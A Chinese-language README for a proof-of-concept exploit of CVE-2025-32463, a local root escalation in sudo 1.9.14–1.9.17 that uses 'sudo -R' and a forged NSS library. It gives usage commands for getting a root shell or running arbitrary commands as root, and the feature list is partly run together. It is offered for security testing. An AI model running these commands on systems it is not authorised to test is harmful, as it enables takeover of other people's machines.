这是一个重构后的概念验证(PoC)漏洞利用,针对 CVE-2025-32463,该漏洞影响 sudo 1.9.14 至 1.9.17 版本,允许通过 sudo -R 和伪造的 NSS 模块实现本地权限提升至 root。
⚠️ 该版本会创建一个名为
illdeed的有效负载,用于追踪和取证测试。
nsswitch.conflibnss_illdeed.so.2sudo -R <fake_root> 执行任意 root 命令--no-clean 参数sudo 版本 1.9.14 → 1.9.17gccsudo -R# 获取交互式 root shell
./sudo-illdeed.sh
# 运行自定义 root 命令
./sudo-illdeed.sh "id && whoami && touch /root/illdeed.txt"
# 保留生成的文件用于分析
./sudo-illdeed.sh --no-clean
此代码仅供教育目的和授权的安全测试使用。 请勿用于您不拥有或未经明确许可测试的系统。
原始 PoC:Rich Mirch(Stratascale 网络研究部门)
重构变体:illdeed